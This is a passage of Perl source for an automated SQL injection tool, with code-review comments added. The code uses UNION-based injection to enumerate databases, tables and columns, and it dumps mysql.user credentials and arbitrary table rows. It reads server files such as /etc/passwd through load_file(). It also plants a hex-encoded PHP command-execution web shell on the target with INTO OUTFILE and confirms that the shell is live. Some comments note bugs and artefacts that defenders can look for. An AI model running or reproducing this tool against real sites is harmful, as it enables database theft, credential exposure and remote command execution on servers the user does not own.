    if ( $_[0] =~ /hackman/ig ) {
        savefile( $save . ".txt", "\n[Target Confirmed] : $_[0]\n" );
        &menu_options( $_[0], $pass, $save );
    }
    else {
        my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
        my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
        unless ( $testar1 eq $testar2 ) {
            motor( $page, $_[1] );
        }
        else {
            print "\n[-] Not vulnerable\n\n";
            print "[+] Scan anyway y/n : ";
            chomp( my $op = <stdin> );
            if ( $op eq "y" ) {
                motor( $page, $_[1] );
            }
            else {
                #head();
                #menu();
            }
        }
    }
}
# Glue between scansqli() and the interactive menu: ask the user-defined
# &length() for the column count and open the menu only when it reports
# success. The '&' form is required because that sub's name shadows Perl's
# length builtin. $pass is a package global that is not assigned in the visible
# part of this file; it is forwarded unchanged, as before.
sub motor {
    my ( $page, $bypass ) = @_;
    my ( $gen, $save, $control ) = &length( $page, $bypass );
    return print "[Status] : Length columns not found\n\n"
      unless $control eq 1;
    print "[Status] : Enjoy the menu\n\n";
    return &menu_options( $gen, $pass, $save );
}
# Find the number of columns in the injectable SELECT by appending
# "and 1=0 union select <markers>" with a growing column list and watching for
# one of the markers to be echoed back. $_[0] is the page URL ending in the
# injectable parameter, $_[1] the bypass style for bypass().
# On success returns ($injection_url_with_placeholder, $save_basename, 1).
# If no marker is seen for 2..200 columns the loop simply ends and the sub
# returns an empty list, so motor() sees undef in every slot.
# NOTE(review): the name shadows Perl's builtin length(); it is only reachable
# through the `&length(...)` call form, which motor() uses. ascii(), toma(),
# partimealmedio() and savefile() are defined outside this section.
sub length {
    print "\n[+] Looking for the number of columns\n\n";
    my $rows = "0";    # unused: the foreach below declares its own $rows
    my $asc;
    my $page = $_[0];
    ( $pass1, $pass2 ) = &bypass( $_[1] );
    # Marker for column 1. ascii() turns the text into the comma list char()
    # expects; the digit between the two RATSXPDOWN halves is the column index.
    $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
    $total = "1";
    for my $rows ( 2 .. 200 ) {
        # Column N gets the marker "RATSXPDOWN<N>RATSXPDOWN" so the echoing
        # column can be read back from the response; one request per N.
        $asc .=
          "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
        $total .= "," . $rows;
        $injection =
            $page . "1"
          . $pass1 . "and"
          . $pass1 . "1=0"
          . $pass1 . "union"
          . $pass1
          . "select"
          . $pass1
          . $alert
          . $asc;
        $test = toma($injection);
        if ( $test =~ /RATSXPDOWN/ ) {
            @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;    # every echoed column index
            $control = 1;
            my $save = partimealmedio( $_[0] );
            savefile( $save . ".txt", "\n[Target confirmed] : $page" );
            savefile( $save . ".txt", "[Bypass] : $_[1]\n" );
            savefile( $save . ".txt", "[Limit] : The site has $rows columns" );
            savefile( $save . ".txt",
                "[Data] : The number @number print data" );
            # Swap the first echoed column index for the "hackman" placeholder
            # that the menu commands substitute later. The index is interpolated
            # into the pattern unescaped and unanchored, so this relies on the
            # first textual match in "1,2,3,..." being the right column.
            $total =~ s/$number[0]/hackman/;
            savefile(
                $save . ".txt",
                "[SQLI] : "
                  . $page . "1"
                  . $pass1 . "and"
                  . $pass1 . "1=0"
                  . $pass1 . "union"
                  . $pass1
                  . "select"
                  . $pass1
                  . $total
            );
            return (
                $page . "1"
                  . $pass1 . "and"
                  . $pass1 . "1=0"
                  . $pass1 . "union"
                  . $pass1
                  . "select"
                  . $pass1
                  . $total,
                $save, $control
            );
        }
    }
}
# Report what the confirmed injection can reach. $page is the injection URL
# with the "hackman" placeholder in the echoing column, $bypass the bypass
# style for bypass(), $save the log basename under logs/webs/.
# Three probes are sent first -- information_schema.tables, mysql.user and
# load_file() -- then one that concatenates version(), database() and user().
# Each probe wraps its value in char(69,82,84,79,82,56,53,52) = "ERTOR854" and
# looks for that marker in the response. 0x2f6574632f706173737764 is
# "/etc/passwd" in hex, so a hit on the third probe means the database account
# can read files from the DB host's filesystem.
# bypass(), toma() and savefile() are defined outside this section.
sub details {
    my ( $page, $bypass, $save ) = @_;
    ( $pass1, $pass2 ) = &bypass($bypass);
    savefile( $save . ".txt", "\n" );
    # Split the URL around the placeholder; $1/$2 are copied immediately.
    if ( $page =~ /(.*)hackman(.*)/ig ) {
        print "\n[+] Searching information..\n\n";
        my ( $start, $end ) = ( $1, $2 );
        $inforschema =
            $start
          . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
          . $end
          . $pass1 . "from"
          . $pass1
          . "information_schema.tables"
          . $pass2;
        $mysqluser =
            $start
          . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
          . $end
          . $pass1 . "from"
          . $pass1
          . "mysql.user"
          . $pass2;
        # The load_file() probe is the first request actually sent.
        $test3 =
          toma( $start
              . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
              . $end
              . $pass2 );
        $test1 = toma($inforschema);
        $test2 = toma($mysqluser);
        if ( $test2 =~ /ERTOR854/ig ) {
            savefile( $save . ".txt", "[mysql.user] : ON" );
            print "[mysql.user] : ON\n";
        }
        else {
            print "[mysql.user] : OFF\n";
            savefile( $save . ".txt", "[mysql.user] : OFF" );
        }
        if ( $test1 =~ /ERTOR854/ig ) {
            print "[information_schema.tables] : ON\n";
            savefile( $save . ".txt", "[information_schema.tables] : ON" );
        }
        else {
            print "[information_schema.tables] : OFF\n";
            savefile( $save . ".txt", "[information_schema.tables] : OFF" );
        }
        # Unlike the two checks above there is no OFF branch here: when
        # load_file() is unavailable nothing is printed or logged.
        if ( $test3 =~ /ERTOR854/ig ) {
            print "[load_file] : ON\n";
            savefile(
                $save . ".txt",
                "[load_file] : "
                  . $start
                  . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
                  . $end
                  . $pass2
            );
        }
        # version(), database() and user() separated by the marker, pulled
        # apart again by the four-marker regex below.
        $concat =
          "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
        $injection = $start . $concat . $end . $pass2;
        $code = toma($injection);
        if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
            print
              "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
            savefile(
                $save . ".txt",
                "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n"
            );
        }
        else {
            print "\n[-] Not found any data\n";
        }
    }
}
# Command loop for a confirmed injection. $_[0] is the injection URL with the
# "hackman" placeholder, $_[1] the bypass style; $save (recomputed from the URL)
# names the log file under logs/webs/. One command is read from STDIN, run, and
# the menu re-entered through &reload.
# NOTE(review): `&reload;` (ampersand, no parens) hands this sub's current @_ to
# reload(), which forwards only $_[0]; from the second command on, $_[1] is
# therefore undef here.
# NOTE(review): "help" is a separate `if`, and every command is matched by an
# unanchored regex, so a line merely containing "help" prints the usage and
# then still runs through the elsif chain.
# NOTE(review): "logs" runs `system("start $t")` with $t built from $save,
# which partimealmedio() derives from the target URL. If that helper does not
# strip shell metacharacters, a crafted target URL can inject a command on the
# operator's own machine; check partimealmedio() before relying on this.
# partimealmedio, schematablesdb, schemacolumnsdb, mysqluser, into, loadfile
# and dump are defined outside this section.
sub menu_options {
    my $save = partimealmedio( $_[0] );
    print "\n/logs/webs/$save>";
    chomp( my $rta = <stdin> );
    if ( $rta =~ /help/ ) {
        print qq(
Commands :
details
tables
columns <table>
dbs
othertable <db>
othercolumn <db> <table>
mysqluser
dumper <table> <column1> <column2>
createshell
readfile
logs
exit
);
    }
    if ( $rta =~ /tables/ ) {
        schematables( $_[0], $_[1], $save );
        &reload;
    }
    elsif ( $rta =~ /columns (.*)/ ) {
        my $tabla = $1;
        schemacolumns( $_[0], $_[1], $save, $tabla );
        &reload;
    }
    elsif ( $rta =~ /dbs/ ) {
        &schemadb( $_[0], $_[1], $save );
        &reload;
    }
    elsif ( $rta =~ /othertable (.*)/ ) {
        my $data = $1;
        &schematablesdb( $_[0], $_[1], $data, $save );
        &reload;
    }
    elsif ( $rta =~ /othercolumn (.*) (.*)/ ) {
        my ( $db, $table ) = ( $1, $2 );
        &schemacolumnsdb( $_[0], $_[1], $db, $table, $save );
        &reload;
    }
    elsif ( $rta =~ /mysqluser/ ) {
        &mysqluser( $_[0], $_[1], $save );
        &reload;
    }
    elsif ( $rta =~ /logs/ ) {
        # Windows "start": hands the log path to the shell so the default
        # viewer opens it. $t is a package global.
        $t = "logs/webs/$save.txt";
        system("start $t");
        &reload;
    }
    elsif ( $rta =~ /exit/ ) {
        # Unwinds out of this sub to the nearest enclosing loop in the caller
        # chain (the main while(1)); Perl warns "Exiting subroutine via next".
        next;
    }
    elsif ( $rta =~ /createshell/ ) {
        print "\n\n[Full Path Discloure] : ";
        chomp( my $path = <STDIN> );
        # No &reload after this or after readfile: the sub returns to its
        # caller once into()/loadfile() come back.
        &into( $_[0], $_[1], $path, $save );
    }
    elsif ( $rta =~ /readfile/ ) {
        loadfile( $_[0], $_[1], $save );
    }
    elsif ( $rta =~ /dumper (.*) (.*) (.*)/ ) {
        my ( $tabla, $col1, $col2 ) = ( $1, $2, $3 );
        # dump is also a Perl builtin (core dump); the & form is what makes
        # this call the user-defined sub instead.
        &dump( $_[0], $col1, $col2, $tabla, $_[1], $save );
        &reload;
    }
    elsif ( $rta =~ /details/ ) {
        &details( $_[0], $_[1], $save );
        &reload;
    }
    else {
        &reload;
    }
}
# List table names in the current database through information_schema.tables.
# ($page, $bypass, $save) are as in details(). The "hackman" placeholder is
# first replaced by Count(*) to get a row count, then by table_name, and the
# listing is paged with "limit N,1" -- one request per table. The marker
# char(82,65,84,83,88,80,68,79,87,78,49) is "RATSXPDOWN1".
# NOTE(review): the printed total subtracts 17 and the loop starts at offset 17,
# presumably to skip the 17 tables that information_schema itself exposed on
# the MySQL versions this was written for; confirm on the target before
# trusting "Tables Length".
sub schematables {
    $real = "1";    # package-global counter shown as "Table N"
    my ( $page, $bypass, $save ) = @_;
    savefile( $save . ".txt", "\n" );
    print "\n";
    my $page1 = $page;
    ( $pass1, $pass2 ) = &bypass( $_[1] );
    savefile( $save . ".txt", "[DB] : default" );
    print "\n[+] Searching tables with schema\n\n";
    $page =~
      s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $page1 =~
      s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code =
      toma( $page1
          . $pass1 . "from"
          . $pass1
          . "information_schema.tables"
          . $pass2 );
    if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
        my $resto = $1;
        $total = $resto - 17;
        print "[+] Tables Length : $total\n\n";
        savefile( $save . ".txt", "[+] Searching tables with schema\n" );
        savefile( $save . ".txt", "[+] Tables Length : $total\n" );
        # $1 is still the raw count captured above (a sub's own matches do not
        # leak into the caller's $1 once it returns).
        my $limit = $1;
        # The loop variable shadows $limit; legal, because the range is built
        # from the outer value before the inner one comes into scope.
        for my $limit ( 17 .. $limit ) {
            $code1 =
              toma( $page
                  . $pass1 . "from"
                  . $pass1
                  . "information_schema.tables"
                  . $pass1 . "limit"
                  . $pass1
                  . $limit . ",1"
                  . $pass2 );
            if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
                my $table = $1;
                chomp $table;
                print "[Table $real Found : $table ]\n";
                savefile( $save . ".txt", "[Table $real Found : $table ]" );
                $real++;
            }
        }
        print "\n";
    }
    else {
        print "\n[-] information_schema = ERROR\n";
    }
}
# Re-enter the interactive menu after a command has finished. Only the first
# argument is forwarded, exactly as in the original: every caller uses the bare
# `&reload;` form, which passes the caller's own @_, so menu_options() is
# re-entered with the injection URL but without the bypass argument.
sub reload {
    my ($page) = @_;
    return &menu_options($page);
}
# List the column names of $table through information_schema.columns.
# ($page, $bypass, $save) are as in details(); $table is the name typed at the
# menu, converted with ascii() into a char() list so it needs no quotes in the
# query. First request: placeholder -> Count(*) for the column count. Then one
# request per column with the placeholder -> column_name and "limit N,1".
# Marker char(82,65,84,83,88,80,68,79,87,78,49) is "RATSXPDOWN1".
sub schemacolumns {
    my ( $page, $bypass, $save, $table ) = @_;
    my $page3 = $page;
    my $page4 = $page;
    savefile( $save . ".txt", "\n" );
    print "\n";
    ( $pass1, $pass2 ) = &bypass($bypass);
    print "\n[DB] : default\n";
    savefile( $save . ".txt", "[DB] : default" );
    savefile( $save . ".txt", "[Table] : $table\n" );
    $page3 =~
      s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 =
      toma( $page3
          . $pass1 . "from"
          . $pass1
          . "information_schema.columns"
          . $pass1 . "where"
          . $pass1
          . "table_name=char("
          . ascii($table) . ")"
          . $pass2 );
    if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
        print "\n[Columns Length : $1 ]\n\n";
        savefile( $save . ".txt", "[Columns Length : $1 ]\n" );
        my $si = $1;
        chomp $si;
        $page4 =~
          s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
        $real = "1";    # package-global counter shown as "Column N"
        # 0 .. $si is inclusive, so one request past the last column is made
        # and simply yields no marker.
        for my $limit2 ( 0 .. $si ) {
            $code4 =
              toma( $page4
                  . $pass1 . "from"
                  . $pass1
                  . "information_schema.columns"
                  . $pass1 . "where"
                  . $pass1
                  . "table_name=char("
                  . ascii($table) . ")"
                  . $pass1 . "limit"
                  . $pass1
                  . $limit2 . ",1"
                  . $pass2 );
            if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
                print "[Column $real] : $1\n";
                savefile( $save . ".txt", "[Column $real] : $1" );
                $real++;
            }
        }
        print "\n";
    }
    else {
        print "\n[-] information_schema = ERROR\n";
    }
}
# List database names through information_schema.schemata, skipping
# information_schema, mysql and phpmyadmin. ($page, $bypass, $save) are as in
# details(). Same two-phase shape as schematables(): Count(*) first, then one
# "limit N,1" request per schema_name. Marker
# char(82,65,84,83,88,80,68,79,87,78,49) is "RATSXPDOWN1".
# NOTE(review): the count query below is the only one in this section that does
# not append $pass2; the per-row queries do. Possibly deliberate, but it means
# the count and the listing are sent with different terminators.
sub schemadb {
    my ( $page, $bypass, $save ) = @_;
    my $page1 = $page;
    savefile( $save . ".txt", "\n" );
    print "\n\n[+] Searching DBS\n\n";
    ( $pass1, $pass2 ) = &bypass($bypass);
    $page =~
      s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code =
      toma( $page . $pass1 . "from" . $pass1 . "information_schema.schemata" );
    if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
        my $limita = $1;
        print "[+] Databases Length : $limita\n\n";
        savefile( $save . ".txt", "[+] Databases Length : $limita\n" );
        $page1 =~
          s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
        $real = "1";    # package-global counter shown as "Database N"
        # 0 .. $limita is inclusive: one request past the end is made.
        for my $limit ( 0 .. $limita ) {
            $code =
              toma( $page1
                  . $pass1 . "from"
                  . $pass1
                  . "information_schema.schemata"
                  . $pass1 . "limit"
                  . $pass1
                  . $limit . ",1"
                  . $pass2 );
            if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
                my $control = $1;
                # System schemas are filtered out of the output, so the
                # printed count can be lower than "Databases Length".
                if ( $control ne "information_schema"
                    and $control ne "mysql"
                    and $control ne "phpmyadmin" )
                {
                    print "[Database $real Found] $control\n";
                    savefile( $save . ".txt",
                        "[Database $real Found] : $control" );
                    $real++;
                }
            }
        }
        print "\n";
    }
    else {
        print "[-] information_schema = ERROR\n";
    }
}
# Lists the table names of one database through information_schema.tables,
# the same way schemadb() lists databases: a Count(*) probe followed by one
# LIMIT-offset request per table.
# Positional arguments: $_[0] URL with the "hackman" placeholder, $_[1] the
# mode for bypass(), $_[2] the database name, $_[3] the log stem handed to
# savefile().  Uses the package globals $pass1/$pass2, $code, $code1 and
# $real.
sub schematablesdb {
    my $page  = $_[0];
    my $db    = $_[2];
    my $page1 = $page;
    savefile( $_[3] . ".txt", "\n" );
    print "\n\n[+] Searching tables with DB $db\n\n";
    ( $pass1, $pass2 ) = &bypass( $_[1] );
    savefile( $_[3] . ".txt", "[DB] : $db" );
    # both variants wrap the value in the "RATSXPDOWN1" marker spelled with
    # char(...); $page selects table_name, $page1 selects Count(*)
    $page =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $page1 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    # ascii($db) turns the name into a comma list for char(...), so the query
    # needs no quote characters
    $code =
      toma( $page1
          . $pass1 . "from"
          . $pass1
          . "information_schema.tables"
          . $pass1 . "where"
          . $pass1
          . "table_schema=char("
          . ascii($db) . ")"
          . $pass2 );
    #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
    if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
        print "[+] Tables Length : $1\n\n";
        savefile( $_[3] . ".txt", "[+] Tables Length : $1\n" );
        my $limit = $1;
        $real = "1";    # running counter shown in the report, starts at 1
        for my $lim ( 0 .. $limit ) {
            $code1 =
              toma( $page
                  . $pass1 . "from"
                  . $pass1
                  . "information_schema.tables"
                  . $pass1 . "where"
                  . $pass1
                  . "table_schema=char("
                  . ascii($db) . ")"
                  . $pass1 . "limit"
                  . $pass1
                  . $lim . ",1"
                  . $pass2 );
            #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
            if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
                my $table = $1;
                chomp $table;
                savefile( $_[3] . ".txt", "[Table $real Found : $table ]" );
                print "[Table $real Found : $table ]\n";
                $real++;
            }
        }
        print "\n";
    }
    else {
        print "\n[-] information_schema = ERROR\n";
    }
}
# Lists the column names of $table inside $db through
# information_schema.columns (filtered on both table_name and table_schema).
# Same shape as schematablesdb(): a Count(*) probe, then one LIMIT-offset
# request per column.  $page must contain the "hackman" placeholder.  Uses
# the package globals $pass1/$pass2 (set from bypass(), which is handed $_[1]
# rather than the named $bypass), $code3, $code4 and $real.  Results are
# printed and appended to logs/webs/<$save>.txt.
sub schemacolumnsdb {
    my ( $page, $bypass, $db, $table, $save ) = @_;
    my $page3 = $page;
    my $page4 = $page;
    print "\n\n[+] Searching columns in table $table with DB $db\n\n";
    savefile( $save . ".txt", "\n" );
    ( $pass1, $pass2 ) = &bypass( $_[1] );
    savefile( $save . ".txt", "\n[DB] : $db" );
    savefile( $save . ".txt", "[Table] : $table" );
    # "RATSXPDOWN1" marker (spelled with char(...)) around Count(*)
    $page3 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 =
      toma( $page3
          . $pass1 . "from"
          . $pass1
          . "information_schema.columns"
          . $pass1 . "where"
          . $pass1
          . "table_name=char("
          . ascii($table) . ")"
          . $pass1 . "and"
          . $pass1
          . "table_schema=char("
          . ascii($db) . ")"
          . $pass2 );
    if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
        print "\n[Columns length : $1 ]\n\n";
        savefile( $save . ".txt", "[Columns length : $1 ]\n" );
        my $si = $1;
        chomp $si;
        # same marker around column_name for the per-row requests
        $page4 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
        $real = "1";    # running counter shown in the report, starts at 1
        for my $limit2 ( 0 .. $si ) {
            $code4 =
              toma( $page4
                  . $pass1 . "from"
                  . $pass1
                  . "information_schema.columns"
                  . $pass1 . "where"
                  . $pass1
                  . "table_name=char("
                  . ascii($table) . ")"
                  . $pass1 . "and"
                  . $pass1
                  . "table_schema=char("
                  . ascii($db) . ")"
                  . $pass1 . "limit"
                  . $pass1
                  . $limit2 . ",1"
                  . $pass2 );
            if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
                print "[Column $real] : $1\n";
                savefile( $save . ".txt", "[Column $real] : $1" );
                $real++;
            }
        }
    }
    else {
        print "\n[-] information_schema = ERROR\n";
    }
    print "\n";
}
# Reads Host, User and Password rows from mysql.user.  A first request only
# checks that the marker comes back at all, a second one fetches Count(*),
# then one request is made per LIMIT offset.  0x524154535850444f574e is the
# hex spelling of the same "RATSXPDOWN" marker used elsewhere in the file.
# $page must contain the "hackman" placeholder.  Uses the package globals
# $pass1/$pass2, $code and $code1; a row that does not match the three-field
# pattern hands control to reload().
sub mysqluser {
    my ( $page, $bypass, $save ) = @_;
    my $cop  = $page;
    my $cop1 = $page;
    savefile( $save . ".txt", "\n" );
    print "\n\n[+] Finding mysql.users\n";
    ( $pass1, $pass2 ) = &bypass($bypass);
    # probe: only the bare marker, to see whether mysql.user is readable
    $page =~ s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
    $code = toma( $page . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
    if ( $code =~ /RATSXPDOWN/ig ) {
        $cop1 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
        $code1 =
          toma( $cop1 . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
        if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
            print "\n[+] Users Found : $1\n\n";
            savefile( $save . ".txt", "\n[+] Users mysql Found : $1\n" );
            # the range is built from $1 before the loop body can clobber it
            for my $limit ( 0 .. $1 ) {
                # substitutes on the first iteration only; later ones find no
                # "hackman" left in $cop
                $cop =~
s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
                $code =
                  toma( $cop
                      . $pass1 . "from"
                      . $pass1
                      . "mysql.user"
                      . $pass1 . "limit"
                      . $pass1
                      . $limit . ",1"
                      . $pass2 );
                if ( $code =~
                    /RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig )
                {
                    print "[Host] : $1 [User] : $2 [Password] : $3\n";
                    savefile( $save . ".txt",
                        "[Host] : $1 [User] : $2 [Password] : $3" );
                }
                else {
                    print "\n";
                    &reload;
                }
            }
        }
    }
    else {
        print "\n[-] mysql.user = ERROR\n\n";
    }
}
# Extracts two columns ($_[1], $_[2]) of table $_[3] row by row.
# Positional arguments: $_[0] URL with the "hackman" placeholder, $_[1] and
# $_[2] column names, $_[3] table name, $_[4] mode for bypass(), $_[5] log
# stem for savefile().  The marker here is "ERTOR854"
# (char(69,82,84,79,82,56,53,52)), matched in the replies below.  Uses the
# package globals $pass1/$pass2, $concatx, $concat, $val_code, $tota and
# $injection.
# NOTE: dump is also the name of a Perl builtin; a bare dump(...) call may
# resolve to CORE::dump instead of this sub (see perlfunc).
sub dump {
    savefile( $_[5] . ".txt", "\n" );
    my $page = $_[0];
    ( $pass1, $pass2 ) = &bypass( $_[4] );
    # split the URL around the placeholder so the expression can be swapped
    if ( $page =~ /(.*)hackman(.*)/ ) {
        my $start = $1;
        my $end   = $2;
        print "\n\n[+] Extracting values...\n\n";
        $concatx =
"unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
        $val_code =
          toma( $start
              . $concatx
              . $end
              . $pass1 . "from"
              . $pass1
              . $_[3]
              . $pass2 );
        $concat =
"unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
        if ( $val_code =~ /ERTOR854(.*)ERTOR854/ig ) {
            $tota = $1;
            print "[+] Table : $_[3]\n";
            print "[+] Length of the rows : $tota\n\n";
            print "[$_[1]] [$_[2]]\n\n";
            savefile( $_[5] . ".txt", "[Table] : $_[3]" );
            savefile( $_[5] . ".txt", "[+] Length of the rows: $tota\n" );
            savefile( $_[5] . ".txt", "[$_[1]] [$_[2]]\n" );
            for my $limit ( 0 .. $tota ) {
                chomp $limit;
                $injection =
                  toma( $start
                      . $concat
                      . $end
                      . $pass1 . "from"
                      . $pass1
                      . $_[3]
                      . $pass1 . "limit"
                      . $pass1
                      . $limit . ",1"
                      . $pass2 );
                if ( $injection =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854/ig ) {
                    savefile( $_[5] . ".txt", "[$_[1]] : $1 [$_[2]] : $2" );
                    print "[$_[1]] : $1 [$_[2]] : $2\n";
                }
                else {
                    print "\n\n[+] Extracting Finish\n\n";
                    last;
                    &reload;    # unreachable: last leaves the loop first
                }
            }
        }
        else {
            print "[-] Not Found any DATA\n\n";
        }
    }
}
# Reads a server-side file through MySQL load_file().  $_[0] is the URL with
# the "hackman" placeholder, $_[1] the mode for bypass(), $_[2] the log stem;
# the file name is read interactively from stdin and turned into a 0x..
# literal by encode().  The marker here is "k0bra" (char(107,48,98,114,97)).
# A found file is printed between "[Source Start]"/"[Source End]" and appended
# to logs/webs/<$_[2]>.txt.  Ends by calling reload() in every case.  Uses
# the package globals $pass1/$pass2 and $concat.
sub loadfile {
    savefile( $_[2] . ".txt", "\n" );
    ( $pass1, $pass2 ) = &bypass( $_[1] );
    if ( $_[0] =~ /(.*)hackman(.*)/g ) {
        my $start = $1;
        my $end   = $2;
        print "\n\n[+] File to read : ";
        chomp( my $file = <stdin> );
        $concat =
            "unhex(hex(concat(char(107,48,98,114,97),load_file("
          . encode($file)
          . "),char(107,48,98,114,97))))";
        # note: $pass1 is not used here, only the terminator $pass2
        my $code = toma( $start . $concat . $end . $pass2 );
        chomp $code;
        # /s so a multi-line file body is captured as a whole
        if ( $code =~ /k0bra(.*)k0bra/s ) {
            print "[File Found] : $file\n";
            print "\n[Source Start]\n\n";
            print $1;
            print "\n\n[Source End]\n\n";
            savefile( $_[2] . ".txt", "[File Found] : $file" );
            savefile( $_[2] . ".txt", "\n[Source Start]\n" );
            savefile( $_[2] . ".txt", "$1" );
            savefile( $_[2] . ".txt", "\n[Source End]\n" );
        }
    }
    &reload;
}
# Tries to create a PHP file on the target with "SELECT ... INTO OUTFILE":
# the long 0x... literal is hex-encoded PHP source, written as
# <$dir>/shell.php once the request path has been stripped from $dir.  The
# routine then fetches http://<host>/<path2>/shell.php and reports
# "[shell up]" only when the reply contains the title "Mini Shell By Doddy".
# That title, and an unexpected shell.php under a web root, are the artefacts
# to look for on a suspected target.  $shell, $code and $code1 are package
# globals; the routine ends by calling reload().
sub into {
    print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
    my ( $page, $bypass, $dir, $save ) = @_;
    savefile( $save . ".txt", "\n" );
    print "\n";
    ( $pass1, $pass2 ) = &bypass($bypass);
    my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
    if ( $path =~ /\/(.*)$/ ) {
        my $path1 = $1;
        my $path2 = $path1;
        # $1 still holds the path captured above, interpolated unescaped
        $path2 =~ s/$1//;
        $dir =~ s/$path1//ig;
        $shell = $dir . "/" . "shell.php";
        if ( $page =~ /(.*)hackman(.*)/ig ) {
            my ( $start, $end ) = ( $1, $2 );
            $code =
              toma( $start
                  . "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
                  . $end
                  . $pass1 . "into"
                  . $pass1
                  . "outfile"
                  . $pass1 . "'"
                  . $shell . "'"
                  . $pass2 );
            # verification request for the file just written
            $code1 =
              toma( "http://" . $auth . "/" . $path2 . "/" . "shell.php" );
            if ( $code1 =~ /Mini Shell By Doddy/ig ) {
                print "[shell up] : http://" . $auth . "/" . $path2 . "/"
                  . "shell.php\a";
                savefile(
                    $save . ".txt",
                    "[shell up] : http://"
                      . $auth . "/"
                      . $path2 . "/"
                      . "shell.php"
                );
            }
            else {
                print "[shell] : Not Found\n";
            }
        }
    }
    print "\n\n";
    &reload;
}
# Returns the (separator, terminator) pair the other routines glue their
# queries together with, keyed on the requested mode: "/*" gives "/**/" and
# "/*", "%20" gives "%20" and "%00", anything else gives "+" and "--".
# Callers store the pair in the package globals $pass1/$pass2.
sub bypass {
    if    ( $_[0] eq "/*" )  { return ( "/**/", "/*" ); }
    elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); }
    else                     { return ( "+", "--" ); }
}
# Returns the code points of $_[0] as a comma-separated list
# (e.g. "abc" -> "97,98,99"), the form MySQL's char(...) accepts.
sub ascii {
    my ($text) = @_;
    my @codepoints = unpack 'U*', $text;
    return join( ',', @codepoints );
}
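# Base64-encodes $_[0] and returns it as a single line.  The empty
# end-of-line argument keeps MIME::Base64 from inserting a newline every 76
# characters, so long inputs no longer come back with embedded line breaks.
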